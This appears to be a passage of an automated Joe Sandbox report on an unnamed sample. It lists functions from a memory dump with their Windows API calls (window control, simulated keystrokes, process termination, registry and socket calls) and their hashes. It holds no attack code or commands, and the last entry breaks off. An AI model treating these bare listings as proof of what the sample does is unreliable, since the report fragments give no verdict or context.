                                                                                                                  • Instruction Fuzzy Hash: FA618930100705DFDB2ABF26D888B35BBF6FB85322F18451EE18696660C770E884DF64
                                                                                                                  APIs
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00DDB204
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InvalidateRect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 634782764-0
                                                                                                                  • Opcode ID: 03bad6ea362d57cd440660e97f0f641879a76d9bd0faac1909c3101373ce738b
                                                                                                                  • Instruction ID: 9032453eb3ce36dbdbff4a7c978a64b5a63c7591da055a0f855d375884f841b4
                                                                                                                  • Opcode Fuzzy Hash: 03bad6ea362d57cd440660e97f0f641879a76d9bd0faac1909c3101373ce738b
                                                                                                                  • Instruction Fuzzy Hash: 13518F31500308FEEB24AF298C89BAE3B65EB06338F254117F955E63A1DB71E950DB74
                                                                                                                  APIs
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00DEE9EA
                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DEEA0B
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DEEA20
                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00DEEA3D
                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DEEA64
                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00DEEA6F
                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DEEA8C
                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00DEEA97
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3992029641-0
                                                                                                                  • Opcode ID: 6529a3df898a8df619a6e9e7db3f4b99ff5c00ac143f506a7f46ed6418f255fc
                                                                                                                  • Instruction ID: d2d43a1ede4770a3d1a49fd728af3e7976dbf2c7227e1bee69d954a789a14737
                                                                                                                  • Opcode Fuzzy Hash: 6529a3df898a8df619a6e9e7db3f4b99ff5c00ac143f506a7f46ed6418f255fc
                                                                                                                  • Instruction Fuzzy Hash: 9D515B70600709AFEB24EF69CC82BAA7BB5AB48754F144529F946D7290D770ED80DB70
                                                                                                                  APIs
                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00DEE9A0,00000004,00000000,00000000), ref: 00D8F737
                                                                                                                  • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00DEE9A0,00000004,00000000,00000000), ref: 00D8F77E
                                                                                                                  • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00DEE9A0,00000004,00000000,00000000), ref: 00DEEB55
                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00DEE9A0,00000004,00000000,00000000), ref: 00DEEBC1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ShowWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1268545403-0
                                                                                                                  • Opcode ID: de2d59921467d421df37829338f86d550b6e16b2b3f38abcc48075d0a7819d9b
                                                                                                                  • Instruction ID: 8ff7bb9ef85d0c4ffbe27720e0a51206100a4a85322d8e56187fc734883fe71d
                                                                                                                  • Opcode Fuzzy Hash: de2d59921467d421df37829338f86d550b6e16b2b3f38abcc48075d0a7819d9b
                                                                                                                  • Instruction Fuzzy Hash: 0341F8302047C09AFB35772A8CC9A3E7B96AB49305F2C496DE0CBC6661D671E881C731
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DAE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DAE158
                                                                                                                    • Part of subcall function 00DAE138: GetCurrentThreadId.KERNEL32 ref: 00DAE15F
                                                                                                                    • Part of subcall function 00DAE138: AttachThreadInput.USER32(00000000,?,00DACDFB,?,00000001), ref: 00DAE166
                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DACE06
                                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00DACE23
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00DACE26
                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DACE2F
                                                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00DACE4D
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00DACE50
                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DACE59
                                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00DACE70
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00DACE73
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2014098862-0
                                                                                                                  • Opcode ID: a38b07fbc6c5b709e3c5e6cac8028f05dff318d7748ff73abdf9117f851ca9a6
                                                                                                                  • Instruction ID: 1641f8ee39bc7d4b82e434d3b40a6f971532bd26d462bee17047c4836602b65e
                                                                                                                  • Opcode Fuzzy Hash: a38b07fbc6c5b709e3c5e6cac8028f05dff318d7748ff73abdf9117f851ca9a6
                                                                                                                  • Instruction Fuzzy Hash: 5611E1B1510718BEF7102B609C8EF6A3B2EDB18754F100415F240AB2E0C9F26C10DAB4
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DAA857: CLSIDFromProgID.COMBASE ref: 00DAA874
                                                                                                                    • Part of subcall function 00DAA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00DAA88F
                                                                                                                    • Part of subcall function 00DAA857: lstrcmpiW.KERNEL32(?,00000000), ref: 00DAA89D
                                                                                                                    • Part of subcall function 00DAA857: CoTaskMemFree.COMBASE(00000000), ref: 00DAA8AD
                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00DCC6AD
                                                                                                                  • _memset.LIBCMT ref: 00DCC6BA
                                                                                                                  • _memset.LIBCMT ref: 00DCC7D8
                                                                                                                  • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 00DCC804
                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 00DCC80F
                                                                                                                  Strings
                                                                                                                  • NULL Pointer assignment, xrefs: 00DCC85D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                  • API String ID: 1300414916-2785691316
                                                                                                                  • Opcode ID: 969586d54561bdadc5ba13acdba8d32de9ce79813ef88b219b5fb6d0dd84ac0a
                                                                                                                  • Instruction ID: 3d5840bd80fda75f2ae54e2c9b7dc47092971692174afe1a6e52ac7916c6c431
                                                                                                                  • Opcode Fuzzy Hash: 969586d54561bdadc5ba13acdba8d32de9ce79813ef88b219b5fb6d0dd84ac0a
                                                                                                                  • Instruction Fuzzy Hash: A4910871D00219ABDB10DFA4DC81FDEBBB9EF09750F20815AE519A7291EB705A45CFB0
                                                                                                                  APIs
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00DD1B09
                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00DD1B17
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DD1B45
                                                                                                                    • Part of subcall function 00D9297D: __wsplitpath_helper.LIBCMT ref: 00D929BD
                                                                                                                  • _wcscat.LIBCMT ref: 00DD1B5A
                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00DD1BD0
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00DD1BE2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                  • String ID: hE
                                                                                                                  • API String ID: 1380811348-3080292677
                                                                                                                  • Opcode ID: cc2f852f6a569e11509d3235fac314bf155cb31c512fd4b165833ea687fa84af
                                                                                                                  • Instruction ID: 902bf835f750c07515111db6e887c6831f7c7aa75fc508b471b8f1a1219d6fd9
                                                                                                                  • Opcode Fuzzy Hash: cc2f852f6a569e11509d3235fac314bf155cb31c512fd4b165833ea687fa84af
                                                                                                                  • Instruction Fuzzy Hash: 99515D71504301AFD720EF24C885EABB7E8EF88754F04491EF58997251EB70EA05CBB2
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DD9926
                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00DD993A
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DD9954
                                                                                                                  • _wcscat.LIBCMT ref: 00DD99AF
                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00DD99C6
                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DD99F4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                                                  • String ID: SysListView32
                                                                                                                  • API String ID: 307300125-78025650
                                                                                                                  • Opcode ID: e0c691841cb134bed602871e36851d686bdaf520cfcfef6f1d5e999063307e36
                                                                                                                  • Instruction ID: 77f292aad1fd1589e36f33363db91a2572e32c64ba4a5ac11174a6ed4f90a971
                                                                                                                  • Opcode Fuzzy Hash: e0c691841cb134bed602871e36851d686bdaf520cfcfef6f1d5e999063307e36
                                                                                                                  • Instruction Fuzzy Hash: 8741A271A00308ABEF219F64C895BEEB7A9EF08754F14442AF589E7291D6729984CB70
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DB6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00DB6F7D
                                                                                                                    • Part of subcall function 00DB6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00DB6F8D
                                                                                                                    • Part of subcall function 00DB6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00DB7022
                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DD168B
                                                                                                                  • GetLastError.KERNEL32 ref: 00DD169E
                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DD16CA
                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00DD1746
                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00DD1751
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00DD1786
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                  • Opcode ID: e304497341775385595a64ceecbd3b9b953ecd2b4cf47c6af5512db045cf04f4
                                                                                                                  • Instruction ID: 0cb4cb3d2ef0ca0fee630dc2a918edafc295abfdb665c40f887a3a6c0dcba730
                                                                                                                  • Opcode Fuzzy Hash: e304497341775385595a64ceecbd3b9b953ecd2b4cf47c6af5512db045cf04f4
                                                                                                                  • Instruction Fuzzy Hash: 994179B5640201AFDB04EF64C8A5FBDB7A6EF54714F19804AF90A9B392EB74D804CB71
                                                                                                                  APIs
                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00DB62D6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconLoad
                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                  • Opcode ID: b185f48f0296eaeec489ee32b0ef1e914ca9f5724f5fd0c9f3b7641b2069f9f9
                                                                                                                  • Instruction ID: f8eb86cb87d05e2eebbc83afb332d6e0115e7352a4d269a7a56af748df2189ef
                                                                                                                  • Opcode Fuzzy Hash: b185f48f0296eaeec489ee32b0ef1e914ca9f5724f5fd0c9f3b7641b2069f9f9
                                                                                                                  • Instruction Fuzzy Hash: 93110D36609353FAFB055B649C42DFA739DDF16324B140029F542B6282EBA8EA40857C
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00DB7595
                                                                                                                  • LoadStringW.USER32(00000000), ref: 00DB759C
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DB75B2
                                                                                                                  • LoadStringW.USER32(00000000), ref: 00DB75B9
                                                                                                                  • _wprintf.LIBCMT ref: 00DB75DF
                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DB75FD
                                                                                                                  Strings
                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00DB75DA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                  • API String ID: 3648134473-3128320259
                                                                                                                  • Opcode ID: 6fa2a1be9aec1506e88c66a2ee2aa6c453d24bb3ace8577d7701908e686ed853
                                                                                                                  • Instruction ID: 4f9b7e3027bd9ba1c765cb695d4955dbf343795b37ed08f56694255372aa9fdb
                                                                                                                  • Opcode Fuzzy Hash: 6fa2a1be9aec1506e88c66a2ee2aa6c453d24bb3ace8577d7701908e686ed853
                                                                                                                  • Instruction Fuzzy Hash: D9011DF2904308BFEB11E7A4AD89EFB776DDB08301F404495B746E6141EA749E848B75
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                    • Part of subcall function 00DD3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DD2AA6,?,?), ref: 00DD3B0E
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DD2AE7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3479070676-0
                                                                                                                  • Opcode ID: 661a439bd3c32c57938c28d48d4323e9bea215586af6e8c920269a0fa190e4f2
                                                                                                                  • Instruction ID: c5df17b83e84568934f7b0d7966544be660bca1b0724beb882cdac83c31300a1
                                                                                                                  • Opcode Fuzzy Hash: 661a439bd3c32c57938c28d48d4323e9bea215586af6e8c920269a0fa190e4f2
                                                                                                                  • Instruction Fuzzy Hash: 059147712042019FCB00EF54C891B7EB7E6FF98310F18885EF996972A1EB71E945CB62
                                                                                                                  APIs
                                                                                                                  • select.WS2_32 ref: 00DC9B38
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC9B45
                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 00DC9B6F
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC9B9F
                                                                                                                  • htons.WS2_32(?), ref: 00DC9C51
                                                                                                                  • inet_ntoa.WS2_32(?), ref: 00DC9C0C
                                                                                                                    • Part of subcall function 00DAE0F5: _strlen.LIBCMT ref: 00DAE0FF
                                                                                                                    • Part of subcall function 00DAE0F5: _memmove.LIBCMT ref: 00DAE121
                                                                                                                  • _strlen.LIBCMT ref: 00DC9CA7
                                                                                                                  • _memmove.LIBCMT ref: 00DC9D10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3637404534-0
                                                                                                                  • Opcode ID: 3b107ebb68a06a9d6ba2ad4925246e57c6e1abd8d086427ae510e3794bc87816
                                                                                                                  • Instruction ID: 14af2b93431d1eaf93185360443bcee1d0a339c3c9627b15383ca9f2bb6a349d
                                                                                                                  • Opcode Fuzzy Hash: 3b107ebb68a06a9d6ba2ad4925246e57c6e1abd8d086427ae510e3794bc87816
